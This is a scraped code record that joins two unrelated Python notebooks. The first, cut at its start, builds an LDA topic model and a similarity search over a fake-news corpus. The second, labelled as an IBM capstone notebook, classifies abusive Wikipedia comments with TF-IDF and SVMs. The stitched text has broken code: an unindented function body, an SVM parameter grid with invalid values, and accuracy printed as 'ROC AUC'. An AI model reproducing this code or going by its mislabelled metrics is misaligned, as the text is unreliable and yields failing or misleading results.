# below become O(1) instead of the O(len(list)) scan per token that the
# original list gave on every word of every article.
stop_words = set(stopwords.words('english'))
def remove_stop_words(text):
    """
    Return *text* (a list of tokens) with all English stopwords removed.
    """
    return [word for word in text if word not in stop_words]
# Shared Porter stemmer instance used by stem_words below.
stemmer = PorterStemmer()
def stem_words(text):
    """
    Stem each token with the Porter stemmer and drop one-letter results,
    so plural and singular forms are treated the same.

    Parameters: text (list[str]) - token list.
    Returns: list[str] - stemmed tokens longer than one character.
    """
    try:
        text = [stemmer.stem(word) for word in text]
        text = [word for word in text if len(word) > 1] # make sure we have no 1 letter words
    except IndexError: # the word "oed" broke this, so needed try except
        # NOTE(review): on IndexError the function deliberately returns the
        # input (or partially processed list) instead of raising.
        pass
    return text
def apply_all(text):
    """Run the full text pipeline: clean, remove stopwords, then stem."""
    cleaned = initial_clean(text)
    without_stops = remove_stop_words(cleaned)
    return stem_words(without_stops)
# -
# clean text and title and create new column "tokenized"
t1 = time.time()
df['tokenized'] = df['text'].apply(apply_all) + df['title'].apply(apply_all)
t2 = time.time()
print("Time to clean and tokenize", len(df), "articles:", (t2-t1)/60, "min")
# ### Get word frequency
#
# We'll use nltk to get a word frequency (by count) here and only keep the top most used words to train the LDA model on
# first get a list of all words
all_words = [word for item in list(df['tokenized']) for word in item]
# use nltk fdist to get a frequency distribution of all words
fdist = FreqDist(all_words)
len(fdist) # number of unique words
# choose k and visually inspect the bottom 10 words of the top k
k = 50000
top_k_words = fdist.most_common(k)
top_k_words[-10:]
# choose k and visually inspect the bottom 10 words of the top k
k = 15000
top_k_words = fdist.most_common(k)
top_k_words[-10:]
# k = 50,000 is too high, as the bottom words aren't even real words and are very rarely used (once in entire corpus)
#
# k = 15,000 is much more reasonable as these have been used at least 13 times in the corpus
# define a function only to keep words in the top k words
top_k_words,_ = zip(*fdist.most_common(k))
top_k_words = set(top_k_words)
def keep_top_k_words(text):
    """Keep only the tokens of *text* that are among the top-k corpus words."""
    kept = [token for token in text if token in top_k_words]
    return kept
df['tokenized'] = df['tokenized'].apply(keep_top_k_words)
# +
# document length
df['doc_len'] = df['tokenized'].apply(lambda x: len(x))
doc_lengths = list(df['doc_len'])
df.drop(labels='doc_len', axis=1, inplace=True)
print("length of list:",len(doc_lengths),
"\naverage document length", np.average(doc_lengths),
"\nminimum document length", min(doc_lengths),
"\nmaximum document length", max(doc_lengths))
# -
# plot a histogram of document length
num_bins = 1000
fig, ax = plt.subplots(figsize=(12,6));
# the histogram of the data
n, bins, patches = ax.hist(doc_lengths, num_bins, normed=1)
ax.set_xlabel('Document Length (tokens)', fontsize=15)
ax.set_ylabel('Normed Frequency', fontsize=15)
ax.grid()
ax.set_xticks(np.logspace(start=np.log10(50),stop=np.log10(2000),num=8, base=10.0))
plt.xlim(0,2000)
ax.plot([np.average(doc_lengths) for i in np.linspace(0.0,0.0035,100)], np.linspace(0.0,0.0035,100), '-',
label='average doc length')
ax.legend()
ax.grid()
fig.tight_layout()
plt.show()
# We can see that, compared to our histogram in exploring_news notebook, the average document length is about half when all stop words are removed and only the top 15,000 words are used.
# ### Drop short articles
#
# LDA does not work very well on short documents, which we will explain later, so we will drop some of the shorter articles here before training the model.
#
# From the histogram above, droping all articles less than 40 tokens seems appropriate.
# only keep articles with at least 40 tokens, otherwise too short
df = df[df['tokenized'].map(len) >= 40]
# make sure all tokenized items are lists
df = df[df['tokenized'].map(type) == list]
df.reset_index(drop=True,inplace=True)
print("After cleaning and excluding short aticles, the dataframe now has:", len(df), "articles")
df.head()
# ### Split the corpus into training and testing
# Here we will split the corpus into training and testing sets.
#
# The training set will be used to train the LDA model on, while the testing set will be used to retrieve similar articles later in our recommendation algorithm.
#
# The dataframe is already shuffled from the begining, so no need to do it again.
# create a mask of binary values
msk = np.random.rand(len(df)) < 0.999
# +
train_df = df[msk]
train_df.reset_index(drop=True,inplace=True)
test_df = df[~msk]
test_df.reset_index(drop=True,inplace=True)
# -
print(len(df),len(train_df),len(test_df))
# # LDA
#
# Latent Dirichlet Allocation, is an unsupervised generative model that assigns topic distributions to documents.
#
# At a high level, the model assumes that each document will contain several topics, so that there is topic overlap within a document. The words in each document contribute to these topics. The topics may not be known a priori, and needn't even be specified, but the **number** of topics must be specified a priori. Finally, there can be words overlap between topics, so several topics may share the same words.
#
# The model generates two **latent** (hidden) variables
# 1) A distribution over topics for each document
# 2) A distribution over words for each topics
#
# After training, each document will have a discrete distribution over all topics, and each topic will have a discrete distribution over all words.
#
# It is best to demonstrate this with an example. Let's say a document about the presidential elections may have a high contribution from the topics "presidential elections", "america", "voting" but have very low contributions from topics "himalayan mountain range", "video games", "machine learning" (assuming the corpus is varied enough to contain such articles); the topics "presidential elections" may have top contributing words ["vote","election","people","usa","clinton","trump",...] whereas the top contributing words in the topic "himalayan mountain range" may be ["nepal","everest","china","altitude","river","snow",....]. This very rough example should give you an idea of what LDA aims to do.
#
# An important point to note: although I have named some topics in the example above, the model itself does not actually do any "naming" or classifying of topics. But by visually inspecting the top contributing words of a topic i.e. the discrete distribution over words for a topic, one can name the topics if necessary after training. We will show this more later.
#
# There a several ways to implement LDA, however I will speak about collapsed gibbs sampling as I usually find this to be the easiest way to understand it.
#
# The model initialises by assigning every word in every document to a **random** topic. Then, we iterate through each word, unassign it's current topic, decrement the topic count corpus wide and reassign the word to a new topic based on the local probability of topic assignemnts to the current document, and the global (corpus wide) probability of the word assignments to the current topic. This may be hard to understand in words, so the equations are below.
# ### The mathematics of collapsed gibbs sampling (cut back version)
#
# Recall that when we iterate through each word in each document, we unassign its current topic assignment and reassign the word to a new topic. The topic we reassign the word to is based on the probabilities below.
#
# $$
# P\left(\text{document "likes" the topic}\right) \times P\left(\text{topic "likes" the word } w'\right)
# $$
#
# $$
# \Rightarrow \frac{n_{i,k}+\alpha}{N_i-1+K\alpha} \times \frac{m_{w',k}+\gamma}{\sum_{w\in V}m_{w,k} + V\gamma}
# $$
#
# where
#
# $n_{i,k}$ - number of word assignments to topic $k$ in document $i$
#
# (i.e. how many of document $i$'s words are currently assigned to topic $k$)
#
# $\alpha$ - smoothing parameter (hyper parameter - make sure probability is never 0)
#
# $N_i$ - number of words in document $i$
#
# $-1$ - don't count the current word you're on
#
# $K$ - total number of topics
#
#
# $m_{w',k}$ - number of assignments, corpus wide, of word $w'$ to topic $k$
#
# (i.e. how often word $w'$ is currently assigned to topic $k$ across the whole corpus)
#
# $\gamma$ - smoothing parameter (hyper parameter - make sure probability is never 0)
#
# $\sum_{w\in V}m_{w,k}$ - sum over all words in vocabulary currently assigned to topic $k$
#
# $V$ - size of vocabulary i.e. number of distinct words corpus wide
# ### Notes and Uses of LDA
#
# LDA has many uses; understanding the different varieties topics in a corpus (obviously), getting a better insight into the type of documents in a corpus (whether they are about news, wikipedia articles, business documents), quantifying the most used / most important words in a corpus, and even document similarity and recommendation.
#
# LDA does not work well with very short documents, like twitter feeds, as explained here [[1]](https://pdfs.semanticscholar.org/f499/5dc2a4eb901594578e3780a6f33dee02dad1.pdf) [[2]](https://stackoverflow.com/questions/29786985/whats-the-disadvantage-of-lda-for-short-texts), which is why we dropped articles under 40 tokens previously. Very briefly, this is because the model infers parameters from observations and if there are not enough observations (words) in a document, the model performs poorly. For short texts, although yet to be rigorously tested, it may be best to use a [biterm model](https://pdfs.semanticscholar.org/f499/5dc2a4eb901594578e3780a6f33dee02dad1.pdf).
#
# Unlike the word2vec algorithm, which performs extremely well with full structured sentences, LDA is a bag of words model, meaning word order in a document doesnt count. This also means that stopwords and rare words should be excluded, so that the model doesnt overcompensate for very frequent words and very rare words, both of which do not contribute to general topics.
#
# #### Hyperparameters
#
# LDA has 2 hyperparameters: $\alpha$ and $\eta$
#
# $\alpha$ - A low value for $\alpha$ means that documents have only a low number of topics contributing to them. A high value of $\alpha$ yields the inverse, meaning the documents appear more alike within a corpus.
#
# $\eta$ - A low value for $\eta$ means the topics have a low number of contributing words. A high value of $\eta$ yields the inverse, meaning topics will have word overlap and appear more alike.
#
# The values of $\alpha$ and $\eta$ really depend on the application, and may need to be tweaked several times before the desired results are found... even then, LDA is non-deterministic since parameters are randomly initialised, so the outcome of any run of the model can never be known in advance.
def train_lda(data):
    """Train a 100-topic LDA model on the tokenized articles in ``data``.

    Builds a gensim dictionary and bag-of-words corpus from the
    'tokenized' column, then fits an ``LdaModel`` with two passes so the
    topic distributions stabilize on this small dataset.

    Returns (dictionary, corpus, lda).
    """
    num_topics = 100
    chunksize = 300  # documents per online (Hoffman-style) update batch
    dictionary = corpora.Dictionary(data['tokenized'])
    corpus = [dictionary.doc2bow(doc) for doc in data['tokenized']]
    t1 = time.time()
    # low alpha means each document is only represented by a small number of topics, and vice versa
    # low eta means each topic is only represented by a small number of words, and vice versa
    lda = LdaModel(corpus=corpus, num_topics=num_topics, id2word=dictionary,
                   alpha=1e-2, eta=0.5e-2, chunksize=chunksize,
                   minimum_probability=0.0, passes=2)
    t2 = time.time()
    # Bug fix: the timing message previously reported len(df) — a global that
    # may differ from (or not be) the argument — instead of len(data).
    print("Time to train LDA model on ", len(data), "articles: ", (t2-t1)/60, "min")
    return dictionary, corpus, lda
# Train the model and keep the dictionary/corpus for later BOW conversion and queries.
dictionary, corpus, lda = train_lda(train_df)
# ### Let's inspect some topics!
#
# Bear in mind, when we see the words they may seem shortened. Recall this is because of our stemming function we previously implemented.
# show_topics shows the top num_words contributing to num_topics randomly chosen topics
lda.show_topics(num_topics=10, num_words=20)
# #### We can inspect individual topics as such
#
# Note that if you re run the model again, as it is non-deterministic, word contributions to topics and topic ID's will change.
# #### This topic is about court cases
lda.show_topic(topicid=4, topn=20)
# #### This topic is about (supposedly) Illegal Immigration
lda.show_topic(topicid=85, topn=20)
# #### This topic is about Religion
lda.show_topic(topicid=75, topn=20)
# #### This topic is about Climate Change
lda.show_topic(topicid=39, topn=20)
# What the above means, is that topic 4 has top contributing words ["judge","case","court",...], which indicates the topic is about court cases. Topic 75 has top contributing words ["god","christian","love",...], which indicates the topic is about religion.
#
# Now, not only can we see the word contribution for each topic, but we can also visualise the topic contribution for each article.
# select an article at random from train_df
random_article_index = np.random.randint(len(train_df))
# column 7 is presumably the 'tokenized' column (see train_lda) — confirm against the frame's layout
bow = dictionary.doc2bow(train_df.iloc[random_article_index,7])
print(random_article_index)
# column 3 presumably holds the article text/title — confirm
print(train_df.iloc[random_article_index,3])
# get the topic contributions for the document chosen at random above
# (minimum_probability=0.0 at training time guarantees all 100 topics are returned, in order)
doc_distribution = np.array([tup[1] for tup in lda.get_document_topics(bow=bow)])
# bar plot of topic distribution for this document
fig, ax = plt.subplots(figsize=(12,6));
# the histogram of the data
patches = ax.bar(np.arange(len(doc_distribution)), doc_distribution)
ax.set_xlabel('Topic ID', fontsize=15)
ax.set_ylabel('Topic Contribution', fontsize=15)
ax.set_title("Topic Distribution for Article " + str(random_article_index), fontsize=20)
ax.set_xticks(np.linspace(10,100,10))
fig.tight_layout()
plt.show()
# Ok, so clearly this document has various contributions from different topics. But what are these topics? Lets find out!
# print the top 5 contributing topics and their words
for i in doc_distribution.argsort()[-5:][::-1]:
    print(i, lda.show_topic(topicid=i, topn=10), "\n")
# Let's interpret this.
#
# Topic 9 - Protests
#
# Topic 72 - Middl Eastern Countries
#
# Topic 36 - Islam
#
# Topic 55 - Power (socio political sense)
#
# Topic 38 - Peoples actions
#
# These are rough interpretations for these topics, most of which make sense. Reading the article we see the it is about riots in the Middle East. So the model seems to have worked well, at least in this one case.
# # Similarity Queries and Unseen Data
#
# We will now turn our attention to the test set of data which the model has not yet seen. Although the articles in *test_df* have been unseen by the model, gensim has a way of infering their topic distributions given the trained model. Of course, the correct approach to yield accurate results would be to retrain the model with these new articles part of the corpus, but this can be timely and infeasable in a real case scenario where results are needed quickly.
#
# First, lets show how we can infer document topics for a new unseen article.
# select an article at random from test_df
random_article_index = np.random.randint(len(test_df))
print(random_article_index)
# Here's the important bit. In obtaining the BOW representation for this unseen article, gensim cleverly only considers words in the existing dictionary we used to train the model. So if there are new words in this article, they will not be considered when infering the topic distribution. This is good in that no errors arise for unseen words, but bad in that some words may be cut out, and therefore we could miss out on an accurate topic distribution for this article.
#
# However, we mitigate this risk because the training set is very much representative of the entire corpus; 99.9% of the observations are in the training set, with only 0.01% of observations in the test set. So most, if not all, words from the test set should be in the training set's dictionary.
# Out-of-dictionary words are silently dropped by doc2bow.
new_bow = dictionary.doc2bow(test_df.iloc[random_article_index,7])
print(test_df.iloc[random_article_index,3])
new_doc_distribution = np.array([tup[1] for tup in lda.get_document_topics(bow=new_bow)])
# Let's do the same visual analysis as before on this new unseen document
# bar plot of topic distribution for this document
fig, ax = plt.subplots(figsize=(12,6));
# the histogram of the data
patches = ax.bar(np.arange(len(new_doc_distribution)), new_doc_distribution)
ax.set_xlabel('Topic ID', fontsize=15)
ax.set_ylabel('Topic Contribution', fontsize=15)
ax.set_title("Topic Distribution for an Unseen Article", fontsize=20)
ax.set_xticks(np.linspace(10,100,10))
fig.tight_layout()
plt.show()
# print the top 5 contributing topics and their words
for i in new_doc_distribution.argsort()[-5:][::-1]:
    print(i, lda.show_topic(topicid=i, topn=10), "\n")
# And there we have it! An accurate topic distribution for an unseen document.
# ### Similarity query
#
# Ok, now that we have a topic distribution for a new unseen document, let's say we wanted to find the most similar documents in the corpus. We can do this by comparing the topic distribution of the new document to all the topic distributions of the documents in the corpus. We use the [Jensen-Shannon distance](https://en.wikipedia.org/wiki/Jensen%E2%80%93Shannon_divergence) metric to find the most similar documents.
#
# What the Jensen-Shannon distance tells us, is which documents are statisically "closer" (and therefore more similar), by comparing the divergence of their distributions. Jensen-Shannon is symmetric, unlike Kullback-Leibler on which the formula is based. This is good, because we want the similarity between documents A and B to be the same as the similarity between B and A.
#
# The formula is described below.
#
# For discrete distirbutions $P$ and $Q$, the Jensen-Shannon divergence, $JSD$ is defined as
#
# $$JSD\left(P||Q\right) = \frac{1}{2}D\left(P||M\right)+\frac{1}{2}D\left(Q||M\right)$$
#
# where $M = \frac{1}{2}\left(P+Q\right)$
#
# and $D$ is the Kullback-Leibler divergence
#
# $$D\left(P||Q\right) = \sum_iP(i)\log\left(\frac{P(i)}{Q(i)}\right)$$
#
# $$\Rightarrow JSD\left(P||Q\right) = \frac{1}{2}\sum_i
# \left[
# P(i)\log\left(\frac{P(i)}{\frac{1}{2}\left(P(i)+Q(i)\right)}\right)
# +
# Q(i)\log\left(\frac{Q(i)}{\frac{1}{2}\left(P(i)+Q(i)\right)}\right)
# \right]$$
#
# The square root of the Jensen-Shannon divergence is the Jensen-Shannon Distance: $\sqrt{JSD\left ( P||Q\right )}$
#
# **The smaller the Jensen-Shannon Distance, the more similar two distributions are (and in our case, the more similar any 2 documents are)**
# We can use the scipy implementation of entropy to do this. Entropy calculates the KL divergence.
#
# But first, we need to get all our LDA topic distributions into a dense matrix. This will enable fast and efficient computation.
#
# We will create a dense matrix, **doc_topic_dist**, of size $M\times K$ where $M$ is the number of documents and $K$ is the number of topics.
# we need to use nested list comprehension here
# this may take 1-2 minutes...
# Rows are documents, columns are the 100 topic probabilities (dense M x K matrix).
doc_topic_dist = np.array([[tup[1] for tup in lst] for lst in lda[corpus]])
doc_topic_dist.shape
def jensen_shannon(query, matrix):
    """Jensen-Shannon distance between one topic distribution and many.

    `query` is a length-K topic distribution; `matrix` is M x K (one
    document distribution per row). Returns a length-M array of distances.
    """
    # Column vector so the query broadcasts against every document column.
    p = query.reshape(-1, 1)
    # One document distribution per column after transposing.
    q = matrix.T
    # Midpoint distribution M = (P + Q) / 2.
    midpoint = (p + q) / 2.0
    # scipy's entropy(pk, qk) is the Kullback-Leibler divergence, reduced
    # over axis 0, so each term below is a length-M vector.
    divergence = 0.5 * (entropy(p, midpoint) + entropy(q, midpoint))
    return np.sqrt(divergence)
# Let's compare the new unseen document, to the corpus, and see which articles are most similar.
def get_most_similar_documents(query, matrix, k=10):
    """Return indices of the k corpus documents closest to `query`.

    Closeness is measured by the Jensen-Shannon distance; the smallest
    distances come first in the result.
    """
    distances = jensen_shannon(query, matrix)
    return distances.argsort()[:k]
# #### Query time + most similar documents... at last!
#
# Ok, let's be 100% clear about what we are doing here.
#
# We are comparing the new unseen document above to the entire corpus of ~10k documents to find which one is most similar to the new document.
#
# How are we doing that? Well, we have the new document's LDA topic distribution stored in the variable **new_doc_distribution**, and we have the topic distributions of the entire corpus of documents stored in the dense matrix **doc_topic_dist**. So now, we pass each row of **doc_topic_dist** through the Jensen-Shannon function above as the Q distribution, while the P distribution remains static as **new_doc_distribution**. Then we get the smallest distances and their corresponding indices in the array, which we can pass to the **train_df** dataframe to print out the most similar documents.
# this is surprisingly fast
most_sim_ids = get_most_similar_documents(new_doc_distribution,doc_topic_dist)
# Row positions from doc_topic_dist are matched against the frame's index here;
# this assumes train_df has a default 0..M-1 RangeIndex — TODO confirm.
most_similar_df = train_df[train_df.index.isin(most_sim_ids)]
most_similar_df['title']
# I think we can see, the top most similar articles are quite similar indeed to the query article ;)
#
# Our query article is about Trump, Huffington Post and the election. The top 10 most similar documents in the corpus also contain these topics, as their title show above. The reader can print out the full articles, or visualise the topic distributions for the most similar document and compare them to the query document to check the overlap.
# ## Conclusion
#
# - After cleaning the corpus and keeping only the top 15,000 words, we reduced the unique words in the corpus by 84%
# - The average document length is halved to 345 tokens after cleaning, compared to the raw version we saw in our explore notebook using word2vec
# - The LDA algorithm was explained in detail
# - The LDA model was able to accurately identify different topics in the fake news corpus. We visually inspected these topics to see that the top words were related
# - We were able to infer a topic distribution from a new unseen document
# - We quickly retrieved the most similar documents in the trained corpus when comparing to the new unseen document. These most similar documents were in fact closely related to the query document
| 24,542 |
/IBM Applied Data Science Capstone.ipynb
|
c0f84ecd9014f9a2c13f1c5e9708c5069743d96d
|
[] |
no_license
|
tvandenboom/Coursera_Capstone
|
https://github.com/tvandenboom/Coursera_Capstone
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,313 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %load_ext jupyternotify
# +
# Standard library
import re
import urllib
import urllib.request  # 'import urllib' alone does not load the 'request' submodule

# Third-party
import numpy as np
import pandas as pd
from sklearn import svm  # required by the svm.SVC() pipelines below
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.metrics import roc_auc_score
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
# -
from sklearn import metrics
from sklearn.metrics import confusion_matrix
# +
# download annotated comments and annotations
ANNOTATED_COMMENTS_URL = 'https://ndownloader.figshare.com/files/7554634'
ANNOTATIONS_URL = 'https://ndownloader.figshare.com/files/7554637'
def download_file(url, fname):
urllib.request.urlretrieve(url, fname)
download_file(ANNOTATED_COMMENTS_URL, 'attack_annotated_comments.tsv')
download_file(ANNOTATIONS_URL, 'attack_annotations.tsv')
# -
comments = pd.read_csv('attack_annotated_comments.tsv', sep = '\t', index_col = 0)
annotations = pd.read_csv('attack_annotations.tsv', sep = '\t')
comments.head()
annotations.head()
# label a comment as an attack if enough annotators did so
# NOTE(review): 0.6 is stricter than a simple majority (> 0.5, the commented-out
# alternative below) — confirm the intended threshold.
labels = annotations.groupby('rev_id')['attack'].mean() > 0.6
# labels = annotations.groupby('rev_id')['attack'].mean() > 0.5
# join labels and comments (aligned on the rev_id index)
comments['attack'] = labels
# remove newline and tab tokens that the dataset uses as placeholders
comments['comment'] = comments['comment'].apply(lambda x: x.replace("NEWLINE_TOKEN", " "))
comments['comment'] = comments['comment'].apply(lambda x: x.replace("TAB_TOKEN", " "))
comments.head()
# Percentage of train, test, and dev data in original data
comments.split.value_counts() / len(comments.index)
# split training, development and testing using the dataset's own 'split' column
train_comments = comments.query("split=='train'")
dev_comments = comments.query("split=='dev'")
test_comments = comments.query("split=='test'")
def get_X_Y(data):
    """Split a comments frame into the text feature and the label column.

    Features are the raw comment strings; labels come from the frame's
    last column (the 'attack' flag appended earlier).
    """
    return data.comment, data.iloc[:, -1]
# Materialize (text, label) pairs for each split.
X_train, Y_train = get_X_Y(train_comments)
X_dev, Y_dev = get_X_Y(dev_comments)
X_test, Y_test = get_X_Y(test_comments)
# ## Text cleaning
## Make sure nltk is downloaded
import nltk.data
# NOTE(review): hard-coded, machine-specific data path — this will break on any
# other machine; prefer the default nltk.data.path or an environment variable.
nltk.data.path = ['/Users/liangpengzhuang/Downloads/nltk_data']
from nltk.corpus import stopwords
# English stopword set shared by the tokenizers below.
stop_words = set(stopwords.words("english"))
# +
# Code reference https://www.kaggle.com/c/word2vec-nlp-tutorial
# -
# Clean comment string, and return a list of words
# Only consider character and number
def comment_to_wordlist(review, remove_stopwords=True):
    """Lower-case a comment and split it into letter-only tokens.

    Every character that is not an ASCII letter or a space becomes a
    space, so the resulting tokens are maximal runs of letters.
    Optionally filters out English stopwords.
    """
    letters_only = re.sub("[^a-zA-Z ]", " ", review)
    tokens = letters_only.lower().split()
    if not remove_stopwords:
        return tokens
    return [token for token in tokens if token not in stop_words]
# +
# Load the punkt sentence tokenizer from the nltk data path configured above.
# tokenizer = nltk.data.load('/Users/liangpengzhuang/Downloads/nltk_data/tokenizers/punkt/english.pickle')
tokenizer = nltk.data.load('nltk:tokenizers/punkt/english.pickle')
# function to split a review into parsed sentences. Comments will be divided to sentences first, and then transform to
# list of words
def review_to_sentences(comment, tokenizer, remove_stopwords):
    """Split a comment into sentences, each tokenized into a word list.

    Uses the given NLTK sentence tokenizer, then delegates per-sentence
    tokenization to comment_to_wordlist. Returns a list of lists of words.
    """
    sentences = []
    for raw_sentence in tokenizer.tokenize(comment.strip()):
        # Skip empty strings the tokenizer may produce.
        if raw_sentence:
            sentences.append(comment_to_wordlist(raw_sentence, remove_stopwords))
    return sentences
# -
# ## N-gram features
# ### cleanning method 1 - Liangpeng
def clean_text(comment):
    """Clean a raw comment into a single space-joined token string."""
    return ' '.join(comment_to_wordlist(comment))
# Apply cleaning method 1 to every comment in the train/test splits.
X_train_clean = X_train.apply(clean_text)
X_test_clean = X_test.apply(clean_text)
# ### cleanning method 2 - Kingston
# true recall + 0.01
# +
# import nltk
# nltk.download()
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import string
import re
# Translation table that strips all ASCII punctuation; built once at import
# time instead of on every call.
_PUNCT_TABLE = str.maketrans('', '', string.punctuation)

def _english_stop_words():
    """Lazily load and memoize the NLTK English stopword set (disk I/O)."""
    cached = getattr(_english_stop_words, "_cache", None)
    if cached is None:
        cached = frozenset(stopwords.words('english'))
        _english_stop_words._cache = cached
    return cached

def text_clean(text):
    """Tokenize, lower-case, strip punctuation and drop stopwords/non-alpha.

    Returns the surviving tokens joined by single spaces. Behavior matches
    the original implementation, but the punctuation table and the
    stopword set are no longer rebuilt on every call (both were per-call
    work before, and stopwords.words() reads from disk).
    """
    tokens = word_tokenize(text)
    # tokens = [w.replace("NEWLINE_TOKEN", " ") for w in tokens]
    # tokens = [w.replace("TAB_TOKEN", " ") for w in tokens]
    tokens = [w.lower() for w in tokens]
    tokens = [w.translate(_PUNCT_TABLE) for w in tokens]
    # isalpha() drops numbers and tokens that became empty after stripping.
    tokens = [w for w in tokens if w.isalpha()]
    stop_words_list = _english_stop_words()
    tokens = [w for w in tokens if w not in stop_words_list]
    return ' '.join(tokens)
# -
# Apply cleaning method 2.
# NOTE(review): this overwrites the method-1 results from the cell above —
# confirm that is intentional (only one cleaning method survives).
X_train_clean = X_train.apply(text_clean)
X_test_clean = X_test.apply(text_clean)
# ### Character level
# Character 1-2-gram counts -> tf-idf -> linear SVM.
clf_char = Pipeline([
    ('vect', CountVectorizer(analyzer='char', max_features = 10000, ngram_range = (1,2))),
    ('tfidf', TfidfTransformer(norm = 'l2')),
    ('clf', LinearSVC()),
])
clf_char = clf_char.fit(X_train_clean, Y_train)
Y_pred = clf_char.predict(X_test_clean)
# NOTE(review): this variable holds accuracy, not AUC — the name is misleading.
auc = accuracy_score(Y_test, Y_pred)
conf = confusion_matrix (Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ### Word level
# #### LinearSVC
clf_word = Pipeline([
    ('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,1))),
    ('tfidf', TfidfTransformer(norm = 'l2')),
    ('clf', LinearSVC(
        # dual=False,
        # tol = 0.01,
        # loss='hinge',
        class_weight='balanced'
    )),
])
clf_word = clf_word.fit(X_train_clean, Y_train)
Y_pred = clf_word.predict(X_test_clean)
conf = confusion_matrix (Y_test, Y_pred)
auc = accuracy_score(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# #### SVM
# NOTE(review): `svm` is not imported in this file's visible import block —
# confirm `from sklearn import svm` exists, otherwise this cell raises NameError.
clf_word = Pipeline([
    ('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
    ('tfidf', TfidfTransformer(norm = 'l2')),
    ('clf', svm.SVC()),
])
clf_word = clf_word.fit(X_train_clean, Y_train)
Y_pred = clf_word.predict(X_test_clean)
conf = confusion_matrix (Y_test, Y_pred)
auc = accuracy_score(Y_test, Y_pred)
# NOTE(review): label says ROC AUC but the value is accuracy_score.
print('Test ROC AUC: %.3f' %auc)
print('Confusion matrix: ', conf)
# ## Hyper-parameter Tunning
# ### LinearSVC
#
# Grid-search pipeline for the LinearSVC word model.
text_clf = Pipeline([
    ('vect', CountVectorizer(max_features = 10000, ngram_range=(1,2))),
    ('tfidf', TfidfTransformer(norm = 'l2')),
    ('clf', LinearSVC(verbose=1)),
])
# +
param_grid = {
    # 'clf__penalty':['l1','l2'],
    'clf__loss':['hinge','squared_hinge'],
    # 'clf__dual':[False],
    'clf__tol':[1e-2,1e-4],
    "clf__C":[1.0],
    # "clf__kernel" : ['rbf', 'linear', 'poly','sigmoid','precomputed'],
    # "clf__degree" : [1, 2, 3, 4, 5],
    'clf__class_weight':[None],
}
from pprint import pprint
pprint(param_grid)
# +
from sklearn.model_selection import GridSearchCV
gs_clf = GridSearchCV(estimator=text_clf, param_grid=param_grid, n_jobs=-1)
gs_clf.fit(X_train_clean, Y_train)
# -
print(gs_clf.best_score_)
for param_name in sorted(param_grid.keys()):
    print("%s: %r" % (param_name, gs_clf.best_params_[param_name]))
# ### SVM
text_clf = Pipeline([
    ('vect', CountVectorizer(max_features = 10000, ngram_range=(1,2))),
    ('tfidf', TfidfTransformer(norm = 'l2')),
    ('clf', svm.SVC()),
])
# +
# NOTE(review): several issues in this grid (it is defined but never fit here):
#   - C=0 is invalid for SVC (C must be > 0);
#   - kernel='precomputed' requires a square kernel matrix, not tf-idf features;
#   - 'class_weight' is missing the 'clf__' prefix used by every other key, so
#     GridSearchCV would reject it.
param_grid = {
    "clf__C" : [0,1,2,3],
    "clf__kernel" : ['rbf', 'linear', 'poly','sigmoid','precomputed'],
    "clf__degree" : [1, 2, 3, 4, 5],
    'clf__tol':[1e-2,1e-1,1e-3],
    'class_weight':['balanced',None]
}
from pprint import pprint
pprint(param_grid)
# -
# -
# ### Stemmer
# Stemmers remove morphological affixes from words, leaving only the word stem.
from nltk.stem import PorterStemmer
ps = PorterStemmer()
def word_to_stem(comment):
    """Clean a comment and reduce every token to its Porter stem."""
    stems = [ps.stem(word) for word in comment_to_wordlist(comment)]
    return ' '.join(stems)
# Stemmed features -> word 1-2-gram tf-idf -> linear SVM.
X_train_stem = X_train.apply(word_to_stem)
X_test_stem = X_test.apply(word_to_stem)
clf_word_stem = Pipeline([
    ('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
    ('tfidf', TfidfTransformer(norm = 'l2')),
    ('clf', LinearSVC()),
])
clf_word_stem = clf_word_stem.fit(X_train_stem , Y_train)
Y_pred = clf_word_stem.predict(X_test_stem)
conf = confusion_matrix (Y_test, Y_pred)
auc = accuracy_score(Y_test, Y_pred)
print(metrics.classification_report(Y_test, Y_pred))
# ### Lemmatizer
# Lemmatize using WordNet's built-in morphy function.
# Returns the input word unchanged if it cannot be found in WordNet.
# WordNet lemmatizer plus the POS tagger used to pick the right lemma sense.
from nltk.stem import WordNetLemmatizer
from nltk.corpus import wordnet
lemmatizer = WordNetLemmatizer()
from nltk import pos_tag
def word_lemm(comment, tokenizer, remove_stopwords=True):
    """Lemmatize every token of a comment using POS-aware WordNet lookups.

    Returns the lemmas as a space-separated string (with a trailing space
    when any token is emitted, matching how the features are consumed).
    """
    lemmas = []
    for sent in review_to_sentences(comment, tokenizer, remove_stopwords):
        for word, treebank_tag in pos_tag(sent):
            wn_pos = get_wordnet_tag(treebank_tag)
            if wn_pos:
                lemmas.append(lemmatizer.lemmatize(word, pos=wn_pos))
            else:
                # No WordNet POS mapping: fall back to the default (noun).
                lemmas.append(lemmatizer.lemmatize(word))
    return ''.join(lemma + ' ' for lemma in lemmas)
def get_wordnet_tag(tag):
    """Map a Penn Treebank POS tag to the matching WordNet POS constant.

    Returns '' for tag families WordNet does not model.
    """
    prefix_map = {
        'J': wordnet.ADJ,
        'V': wordnet.VERB,
        'N': wordnet.NOUN,
        'R': wordnet.ADV,
    }
    # Treebank tags encode the family in their first letter (JJ/VB/NN/RB...).
    return prefix_map.get(tag[:1], '')
# Lemmatized features -> word 1-2-gram tf-idf -> linear SVM.
X_train_lemm = X_train.apply(lambda x: word_lemm(x, tokenizer))
X_test_lemm = X_test.apply(lambda x: word_lemm(x, tokenizer))
clf_word_lemm = Pipeline([
    ('vect', CountVectorizer(analyzer='word', max_features = 10000, ngram_range = (1,2))),
